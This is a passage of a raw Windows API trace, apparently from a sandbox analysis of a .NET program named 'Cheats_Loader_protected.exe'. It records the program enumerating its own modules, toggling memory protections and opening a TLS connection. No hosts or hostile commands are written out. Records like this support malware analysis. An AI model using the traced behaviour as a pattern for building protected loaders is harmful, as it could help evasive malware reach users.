hKey=0x5a4, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x13fe9dc, lpData=0x0, lpcbData=0x13fe9d8*=0x0 | out: lpType=0x13fe9dc*=0x0, lpData=0x0, lpcbData=0x13fe9d8*=0x0) returned 0x2 [0084.536] RegCloseKey (hKey=0x5a4) returned 0x0 [0084.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13d8) returned 0x5a4 [0084.541] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x3767f04, cb=0x100, lpcbNeeded=0x13fe9c0 | out: lphModule=0x3767f04, lpcbNeeded=0x13fe9c0) returned 1 [0084.541] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x3768010, cb=0x200, lpcbNeeded=0x13fe9c0 | out: lphModule=0x3768010, lpcbNeeded=0x13fe9c0) returned 1 [0084.541] GetModuleInformation (in: hProcess=0x5a4, hModule=0xa90000, lpmodinfo=0x3768250, cb=0xc | out: lpmodinfo=0x3768250*(lpBaseOfDll=0xa90000, SizeOfImage=0x388000, EntryPoint=0xe15c44)) returned 1 [0084.541] CoTaskMemAlloc (cb=0x804) returned 0x10cd90 [0084.541] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa90000, lpBaseName=0x10cd90, nSize=0x800 | out: lpBaseName="Cheats_Loader_protected.exe") returned 0x1b [0084.541] CoTaskMemFree (pv=0x10cd90) [0084.541] CoTaskMemAlloc (cb=0x804) returned 0x10cd90 [0084.541] GetModuleFileNameExW (in: hProcess=0x5a4, hModule=0xa90000, lpFilename=0x10cd90, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0084.541] CoTaskMemFree (pv=0x10cd90) [0084.541] CloseHandle (hObject=0x5a4) returned 1 [0084.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x105, lpBuffer=0x13fe4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x0) returned 0x33 [0084.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9b8 | out: phkResult=0x13fe9b8*=0x0) returned 0x2 [0084.542] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9b8 | out: phkResult=0x13fe9b8*=0x5a4) returned 0x0 [0084.542] RegQueryValueExW (in: hKey=0x5a4, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x13fe9d4, lpData=0x0, lpcbData=0x13fe9d0*=0x0 | out: lpType=0x13fe9d4*=0x0, lpData=0x0, lpcbData=0x13fe9d0*=0x0) returned 0x2 [0084.542] RegCloseKey (hKey=0x5a4) returned 0x0 [0084.548] GetProcAddress (hModule=0x772d0000, lpProcName="LocalFree") returned 0x772e5b40 [0084.552] GetProcAddress (hModule=0x772d0000, lpProcName="LocalAlloc") returned 0x772e5b20 [0084.554] GetProcAddress (hModule=0x772d0000, lpProcName="LocalAllocW") returned 0x0 [0084.554] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0xeac28 [0084.558] SysReAllocStringLen (in: pbstr=0x13fdd40*=0x0, psz="crypt32.dll", len=0xb | out: pbstr=0x13fdd40*="crypt32.dll") returned 1 [0084.558] CharLowerBuffW (in: lpsz="crypt32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0084.558] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0084.558] GetLastError () returned 0x7e [0084.558] SetLastError (dwErrCode=0x7e) [0084.562] SysReAllocStringLen (in: pbstr=0x13fdd40*=0x0, psz="crypt32.dll", len=0xb | out: pbstr=0x13fdd40*="crypt32.dll") returned 1 [0084.562] CharLowerBuffW (in: lpsz="crypt32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0084.562] LoadLibraryExW (lpLibFileName="crypt32.dll", hFile=0x0, dwFlags=0x800) returned 0x74df0000 [0085.141] GetLastError () returned 0x0 [0085.141] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0085.141] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0085.141] GetModuleFileNameA (in: hModule=0x74df0000, lpFilename=0x13fdc24, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc2b4, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x4, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x2) returned 0x0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc2b4, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x2, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x4) returned 0x0 [0085.142] GetCurrentProcess () returned 0xffffffff [0085.142] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc2b8, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x4, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x2) returned 0x0 [0085.143] GetCurrentProcess () returned 0xffffffff [0085.143] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc2b8, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x2, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x4) returned 0x0 [0085.143] GetCurrentProcess () returned 0xffffffff [0085.143] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc200, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x4, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x2) returned 0x0 [0085.144] GetCurrentProcess () returned 0xffffffff [0085.144] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd28*=0x74edc200, NumberOfBytesToProtect=0x13fdd2c, NewAccessProtection=0x2, OldAccessProtection=0x13fdd60 | out: BaseAddress=0x13fdd28*=0x74edc000, NumberOfBytesToProtect=0x13fdd2c, OldAccessProtection=0x13fdd60*=0x4) returned 0x0 [0085.144] SetLastError (dwErrCode=0x0) [0085.145] GetProcAddress (hModule=0x74df0000, lpProcName="CryptFindOIDInfo") returned 0x74e3bcf0 [0085.146] GetProcAddress (hModule=0x74df0000, lpProcName="CryptFindOIDInfoW") returned 0x0 [0085.148] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0xeac28, dwGroupId=0x0) returned 0x0 [0085.167] LocalFree (hMem=0xeac28) returned 0x0 [0085.167] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x111f88 [0085.167] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x111f88, dwGroupId=0x0) returned 0x0 [0085.167] LocalFree (hMem=0x111f88) returned 0x0 [0085.170] SysReAllocStringLen (in: pbstr=0x13fdd70*=0x0, psz="secur32.dll", len=0xb | out: pbstr=0x13fdd70*="secur32.dll") returned 1 [0085.170] CharLowerBuffW (in: lpsz="secur32.dll", cchLength=0xb | out: lpsz="secur32.dll") returned 0xb [0085.171] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0085.171] GetLastError () returned 0x7e [0085.171] SetLastError (dwErrCode=0x7e) [0085.176] SysReAllocStringLen (in: pbstr=0x13fdd70*=0x0, psz="secur32.dll", len=0xb | out: pbstr=0x13fdd70*="secur32.dll") returned 1 [0085.176] CharLowerBuffW (in: lpsz="secur32.dll", cchLength=0xb | out: lpsz="secur32.dll") returned 0xb [0085.239] LoadLibraryExW (lpLibFileName="secur32.dll", hFile=0x0, dwFlags=0x800) returned 0x6f3e0000 [0085.356] GetLastError () returned 0x0 [0085.357] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0085.357] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0085.357] GetModuleFileNameA (in: hModule=0x6f3e0000, lpFilename=0x13fdc54, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0085.357] GetCurrentProcess () returned 0xffffffff [0085.357] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd58*=0x6f3e6040, NumberOfBytesToProtect=0x13fdd5c, NewAccessProtection=0x4, OldAccessProtection=0x13fdd90 | out: BaseAddress=0x13fdd58*=0x6f3e6000, NumberOfBytesToProtect=0x13fdd5c, OldAccessProtection=0x13fdd90*=0x2) returned 0x0 [0085.357] GetCurrentProcess () returned 0xffffffff [0085.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd58*=0x6f3e6040, NumberOfBytesToProtect=0x13fdd5c, NewAccessProtection=0x2, OldAccessProtection=0x13fdd90 | out: BaseAddress=0x13fdd58*=0x6f3e6000, NumberOfBytesToProtect=0x13fdd5c, OldAccessProtection=0x13fdd90*=0x4) returned 0x0 [0085.358] GetCurrentProcess () returned 0xffffffff [0085.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd58*=0x6f3e6048, NumberOfBytesToProtect=0x13fdd5c, NewAccessProtection=0x4, OldAccessProtection=0x13fdd90 | out: BaseAddress=0x13fdd58*=0x6f3e6000, NumberOfBytesToProtect=0x13fdd5c, OldAccessProtection=0x13fdd90*=0x2) returned 0x0 [0085.358] GetCurrentProcess () returned 0xffffffff [0085.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd58*=0x6f3e6048, NumberOfBytesToProtect=0x13fdd5c, NewAccessProtection=0x2, OldAccessProtection=0x13fdd90 | out: BaseAddress=0x13fdd58*=0x6f3e6000, NumberOfBytesToProtect=0x13fdd5c, OldAccessProtection=0x13fdd90*=0x4) returned 0x0 [0085.359] SetLastError (dwErrCode=0x0) [0085.359] GetProcAddress (hModule=0x6f3e0000, lpProcName="EnumerateSecurityPackagesW") returned 0x74455230 [0085.360] GetProcAddress (hModule=0x6f3e0000, lpProcName="FreeContextBuffer") returned 0x7444c710 [0085.360] EnumerateSecurityPackagesW (in: pcPackages=0x13fe9fc, ppPackageInfo=0x13fe990 | out: pcPackages=0x13fe9fc, ppPackageInfo=0x13fe990) returned 0x0 [0085.373] FreeContextBuffer (in: pvContextBuffer=0x1169e0 | out: pvContextBuffer=0x1169e0) returned 0x0 [0085.381] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x13fe7c0 | out: TokenHandle=0x13fe7c0*=0x614) returned 1 [0085.383] GetProcAddress (hModule=0x6f3e0000, lpProcName="FreeCredentialsHandle") returned 0x74454940 [0085.384] GetProcAddress (hModule=0x6f3e0000, lpProcName="AcquireCredentialsHandleW") returned 0x744544f0 [0085.384] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x376a958, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x13fe814, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x376c104, ptsExpiry=0x13fe798 | out: phCredential=0x376c104, ptsExpiry=0x13fe798) returned 0x0 [0085.813] GetProcAddress (hModule=0x6f3e0000, lpProcName="DeleteSecurityContext") returned 0x74455110 [0085.813] GetProcAddress (hModule=0x6f3e0000, lpProcName="InitializeSecurityContextW") returned 0x744549b0 [0085.813] InitializeSecurityContextW (in: phCredential=0x13fe7d4, phContext=0x0, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376c2a0, pfContextAttr=0x376a92c, ptsExpiry=0x13fe7cc | out: phNewContext=0x376c308, pOutput=0x376c2a0, pfContextAttr=0x376a92c, ptsExpiry=0x13fe7cc) returned 0x90312 [0085.814] FreeContextBuffer (in: pvContextBuffer=0xcc2a8 | out: pvContextBuffer=0xcc2a8) returned 0x0 [0085.818] SysReAllocStringLen (in: pbstr=0x13fe828*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fe828*="kernel32.dll") returned 1 [0085.818] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.818] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0085.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="AppPolicyGetClrCompat", cchWideChar=21, lpMultiByteStr=0x13fe814, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppPolicyGetClrCompatãØq\x067\x16¼ðù¦s\x10ï?\x01\x01", lpUsedDefaultChar=0x0) returned 21 [0085.823] GetProcAddress (hModule=0x772d0000, lpProcName="AppPolicyGetClrCompat") returned 0x74c968b0 [0085.826] GetProcAddress (hModule=0x772d0000, lpProcName="AppPolicyGetClrCompat") returned 0x74c968b0 [0085.829] AppPolicyGetClrCompat () returned 0x0 [0085.830] GetProcAddress (hModule=0x754f0000, lpProcName="send") returned 0x754f5030 [0085.830] send (s=0x5d4, buf=0x376c31c*, len=124, flags=0) returned 124 [0085.833] GetProcAddress (hModule=0x754f0000, lpProcName="recv") returned 0x75500c50 [0085.833] recv (in: s=0x5d4, buf=0x376c31c, len=5, flags=0 | out: buf=0x376c31c*) returned 5 [0085.899] recv (in: s=0x5d4, buf=0x376c321, len=67, flags=0 | out: buf=0x376c321*) returned 67 [0085.900] InitializeSecurityContextW (in: phCredential=0x13fe72c, phContext=0x13fe7bc, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376c6f4, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376c708, pfContextAttr=0x376a92c, ptsExpiry=0x13fe724 | out: phNewContext=0x376c308, pOutput=0x376c708, pfContextAttr=0x376a92c, ptsExpiry=0x13fe724) returned 0x90312 [0085.900] recv (in: s=0x5d4, buf=0x376c798, len=5, flags=0 | out: buf=0x376c798*) returned 5 [0085.900] recv (in: s=0x5d4, buf=0x376c7b1, len=2213, flags=0 | out: buf=0x376c7b1*) returned 2213 [0085.901] InitializeSecurityContextW (in: phCredential=0x13fe688, phContext=0x13fe718, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d0c8, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d0dc, pfContextAttr=0x376a92c, ptsExpiry=0x13fe680 | out: phNewContext=0x376c308, pOutput=0x376d0dc, pfContextAttr=0x376a92c, ptsExpiry=0x13fe680) returned 0x90312 [0085.906] recv (in: s=0x5d4, buf=0x376d16c, len=5, flags=0 | out: buf=0x376d16c*) returned 5 [0085.906] recv (in: s=0x5d4, buf=0x376d185, len=114, flags=0 | out: buf=0x376d185*) returned 114 [0085.906] InitializeSecurityContextW (in: phCredential=0x13fe5e4, phContext=0x13fe674, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d268, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d27c, pfContextAttr=0x376a92c, ptsExpiry=0x13fe5dc | out: phNewContext=0x376c308, pOutput=0x376d27c, pfContextAttr=0x376a92c, ptsExpiry=0x13fe5dc) returned 0x90312 [0085.906] recv (in: s=0x5d4, buf=0x376d30c, len=5, flags=0 | out: buf=0x376d30c*) returned 5 [0085.906] recv (in: s=0x5d4, buf=0x376d325, len=4, flags=0 | out: buf=0x376d325*) returned 4 [0085.907] InitializeSecurityContextW (in: phCredential=0x13fe540, phContext=0x13fe5d0, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d39c, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d3b0, pfContextAttr=0x376a92c, ptsExpiry=0x13fe538 | out: phNewContext=0x376c308, pOutput=0x376d3b0, pfContextAttr=0x376a92c, ptsExpiry=0x13fe538) returned 0x90312 [0086.052] FreeContextBuffer (in: pvContextBuffer=0x100518 | out: pvContextBuffer=0x100518) returned 0x0 [0086.053] send (s=0x5d4, buf=0x376d42c*, len=101, flags=0) returned 101 [0086.053] recv (in: s=0x5d4, buf=0x376d42c, len=5, flags=0 | out: buf=0x376d42c*) returned 5 [0086.066] recv (in: s=0x5d4, buf=0x376d4b9, len=202, flags=0 | out: buf=0x376d4b9*) returned 202 [0086.066] InitializeSecurityContextW (in: phCredential=0x13fe49c, phContext=0x13fe52c, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d5f4, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d608, pfContextAttr=0x376a92c, ptsExpiry=0x13fe494 | out: phNewContext=0x376c308, pOutput=0x376d608, pfContextAttr=0x376a92c, ptsExpiry=0x13fe494) returned 0x90312 [0086.067] recv (in: s=0x5d4, buf=0x376d698, len=5, flags=0 | out: buf=0x376d698*) returned 5 [0086.067] recv (in: s=0x5d4, buf=0x376d6b1, len=1, flags=0 | out: buf=0x376d6b1*) returned 1 [0086.067] InitializeSecurityContextW (in: phCredential=0x13fe3f8, phContext=0x13fe488, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d724, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d738, pfContextAttr=0x376a92c, ptsExpiry=0x13fe3f0 | out: phNewContext=0x376c308, pOutput=0x376d738, pfContextAttr=0x376a92c, ptsExpiry=0x13fe3f0) returned 0x90312 [0086.067] recv (in: s=0x5d4, buf=0x376d7c8, len=5, flags=0 | out: buf=0x376d7c8*) returned 5 [0086.067] recv (in: s=0x5d4, buf=0x376d7e1, len=48, flags=0 | out: buf=0x376d7e1*) returned 48 [0086.068] InitializeSecurityContextW (in: phCredential=0x13fe354, phContext=0x13fe3e4, pTargetName=0x3762190, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x376d884, Reserved2=0x0, phNewContext=0x376c308, pOutput=0x376d898, pfContextAttr=0x376a92c, ptsExpiry=0x13fe34c | out: phNewContext=0x376c308, pOutput=0x376d898, pfContextAttr=0x376a92c, ptsExpiry=0x13fe34c) returned 0x0 [0087.050] GetProcAddress (hModule=0x6f3e0000, lpProcName="QueryContextAttributesW") returned 0x74455560 [0087.050] QueryContextAttributesW (in: phContext=0x376c308, ulAttribute=0x4, pBuffer=0x376d944 | out: pBuffer=0x376d944) returned 0x0 [0087.051] QueryContextAttributesW (in: phContext=0x376c308, ulAttribute=0x5a, pBuffer=0x376d99c | out: pBuffer=0x376d99c) returned 0x0 [0087.052] GetProcAddress (hModule=0x74df0000, lpProcName="CertFreeCertificateContext") returned 0x74e2da30 [0087.053] QueryContextAttributesW (in: phContext=0x376c308, ulAttribute=0x53, pBuffer=0x376da48 | out: pBuffer=0x376da48) returned 0x0 [0087.056] GetProcAddress (hModule=0x74df0000, lpProcName="CertFreeCertificateContext") returned 0x74e2da30 [0087.060] SysReAllocStringLen (in: pbstr=0x13fdddc*=0x0, psz="CRYPT32.dll", len=0xb | out: pbstr=0x13fdddc*="CRYPT32.dll") returned 1 [0087.060] CharLowerBuffW (in: lpsz="CRYPT32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0087.060] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0087.060] GetLastError () returned 0x7e [0087.061] SetLastError (dwErrCode=0x7e) [0087.061] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c164, cbMultiByte=11, lpWideCharStr=0x13fd2b0, cchWideChar=2047 | out: lpWideCharStr="CRYPT32.dll\x99\x09") returned 11 [0087.061] SysReAllocStringLen (in: pbstr=0x13fe2b4*=0x0, psz="CRYPT32.dll", len=0xb | out: pbstr=0x13fe2b4*="CRYPT32.dll") returned 1 [0087.061] CharLowerBuffW (in: lpsz="CRYPT32.dll", cchLength=0xb | out: lpsz="crypt32.dll") returned 0xb [0087.061] LoadLibraryExA (lpLibFileName="CRYPT32.dll", hFile=0x0, dwFlags=0x0) returned 0x74df0000 [0087.061] GetLastError () returned 0x0 [0087.062] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0087.062] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0087.062] GetModuleFileNameA (in: hModule=0x74df0000, lpFilename=0x13fe19c, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0087.062] GetCurrentProcess () returned 0xffffffff [0087.062] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe2a0*=0x74edc2b4, NumberOfBytesToProtect=0x13fe2a4, NewAccessProtection=0x4, OldAccessProtection=0x13fe2d8 | out: BaseAddress=0x13fe2a0*=0x74edc000, NumberOfBytesToProtect=0x13fe2a4, OldAccessProtection=0x13fe2d8*=0x2) returned 0x0 [0087.063] GetCurrentProcess () returned 0xffffffff [0087.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe2a0*=0x74edc2b4, NumberOfBytesToProtect=0x13fe2a4, NewAccessProtection=0x2, OldAccessProtection=0x13fe2d8 | out: BaseAddress=0x13fe2a0*=0x74edc000, NumberOfBytesToProtect=0x13fe2a4, OldAccessProtection=0x13fe2d8*=0x4) returned 0x0 [0087.063] GetCurrentProcess () returned 0xffffffff [0087.063] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe2a0*=0x74edc2b8, NumberOfBytesToProtect=0x13fe2a4, NewAccessProtection=0x4, OldAccessProtection=0x13fe2d8 | out: BaseAddress=0x13fe2a0*=0x74edc000, NumberOfBytesToProtect=0x13fe2a4, OldAccessProtection=0x13fe2d8*=0x2) returned 0x0 [0087.064] GetCurrentProcess () returned 0xffffffff [0087.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe2a0*=0x74edc2b8, NumberOfBytesToProtect=0x13fe2a4, NewAccessProtection=0x2, OldAccessProtection=0x13fe2d8 | out: BaseAddress=0x13fe2a0*=0x74edc000, NumberOfBytesToProtect=0x13fe2a4, OldAccessProtection=0x13fe2d8*=0x4) returned 0x0 [0087.064] SetLastError (dwErrCode=0x0) [0087.064] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateCertificateContext") returned 0x74e25780 [0087.065] GetProcAddress (hModule=0x74df0000, lpProcName="CertGetCertificateContextProperty") returned 0x74e31860 [0087.066] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateCertificateContext") returned 0x74e25780 [0087.067] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateCertificateContextW") returned 0x0 [0087.067] CertDuplicateCertificateContext (pCertContext=0x1157d0) returned 0x1157d0 [0087.067] GetProcAddress (hModule=0x74df0000, lpProcName="CertCloseStore") returned 0x74e2dc00 [0087.068] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateStore") returned 0x74e1b140 [0087.068] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateStoreW") returned 0x0 [0087.068] CertDuplicateStore (hCertStore=0x102cc0) returned 0x102cc0 [0087.069] GetProcAddress (hModule=0x74df0000, lpProcName="CertEnumCertificatesInStore") returned 0x74e1ff20 [0087.069] GetProcAddress (hModule=0x74df0000, lpProcName="CertEnumCertificatesInStoreW") returned 0x0 [0087.070] CertEnumCertificatesInStore (hCertStore=0x102cc0, pPrevCertContext=0x0) returned 0x115820 [0087.070] CertDuplicateCertificateContext (pCertContext=0x115820) returned 0x115820 [0087.070] CertEnumCertificatesInStore (hCertStore=0x102cc0, pPrevCertContext=0x115820) returned 0x1157d0 [0087.070] CertDuplicateCertificateContext (pCertContext=0x1157d0) returned 0x1157d0 [0087.070] CertEnumCertificatesInStore (hCertStore=0x102cc0, pPrevCertContext=0x1157d0) returned 0x0 [0087.070] CertCloseStore (hCertStore=0x102cc0, dwFlags=0x0) returned 1 [0087.071] CertFreeCertificateContext (pCertContext=0x1157d0) returned 1 [0087.072] GetProcAddress (hModule=0x74df0000, lpProcName="CertFreeCertificateChain") returned 0x74e0f6c0 [0087.154] GetProcAddress (hModule=0x74df0000, lpProcName="CertOpenStore") returned 0x74e357a0 [0087.155] GetProcAddress (hModule=0x74df0000, lpProcName="CertOpenStoreW") returned 0x0 [0087.155] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x102b58 [0087.155] GetProcAddress (hModule=0x74df0000, lpProcName="CertAddCertificateLinkToStore") returned 0x74e6ebc0 [0087.156] GetProcAddress (hModule=0x74df0000, lpProcName="CertAddCertificateLinkToStoreW") returned 0x0 [0087.157] CertAddCRLLinkToStore (in: hCertStore=0x102b58, pCrlContext=0x115820, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0087.158] CertAddCRLLinkToStore (in: hCertStore=0x102b58, pCrlContext=0x1157d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0087.159] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x1166e8 [0087.165] GetProcAddress (hModule=0x74df0000, lpProcName="CertGetCertificateChain") returned 0x74e24cb0 [0087.165] GetProcAddress (hModule=0x74df0000, lpProcName="CertGetCertificateChainW") returned 0x0 [0087.166] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1157d0, pTime=0x13fe364, hAdditionalStore=0x102b58, pChainPara=0x13fe2a4, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x13fe298 | out: ppChainContext=0x13fe298) returned 1 [0087.176] LocalFree (hMem=0x1166e8) returned 0x0 [0087.176] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateCertificateChain") returned 0x74e1b880 [0087.176] GetProcAddress (hModule=0x74df0000, lpProcName="CertDuplicateCertificateChainW") returned 0x0 [0087.177] CertDuplicateCertificateChain (pChainContext=0x11bde8) returned 0x11bde8 [0087.177] CertDuplicateCertificateContext (pCertContext=0x1157d0) returned 0x1157d0 [0087.177] CertDuplicateCertificateContext (pCertContext=0x115690) returned 0x115690 [0087.178] CertDuplicateCertificateContext (pCertContext=0x1158c0) returned 0x1158c0 [0087.178] CertFreeCertificateChain (pChainContext=0x11bde8) [0087.178] GetProcAddress (hModule=0x74df0000, lpProcName="CertVerifyCertificateChainPolicy") returned 0x74e39b10 [0087.179] GetProcAddress (hModule=0x74df0000, lpProcName="CertVerifyCertificateChainPolicyW") returned 0x0 [0087.179] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x11bde8, pPolicyPara=0x13fe444, pPolicyStatus=0x13fe430 | out: pPolicyStatus=0x13fe430) returned 1 [0087.182] GetProcAddress (hModule=0x772d0000, lpProcName="SetLastError") returned 0x772e4f00 [0087.182] SetLastError (dwErrCode=0x0) [0087.184] GetProcAddress (hModule=0x74df0000, lpProcName="CertFreeCertificateChain") returned 0x74e0f6c0 [0087.185] GetProcAddress (hModule=0x74df0000, lpProcName="CertVerifyCertificateChainPolicy") returned 0x74e39b10 [0087.185] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x11bde8, pPolicyPara=0x13fe4a4, pPolicyStatus=0x13fe458 | out: pPolicyStatus=0x13fe458) returned 1 [0087.190] CertFreeCertificateChain (pChainContext=0x11bde8) [0087.190] CertFreeCertificateContext (pCertContext=0x1157d0) returned 1 [0087.191] GetProcAddress (hModule=0x74df0000, lpProcName="CertFreeCertificateContext") returned 0x74e2da30 [0087.245] CoTaskMemAlloc (cb=0x20c) returned 0x127898 [0087.245] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x127898, nSize=0x104 | out: 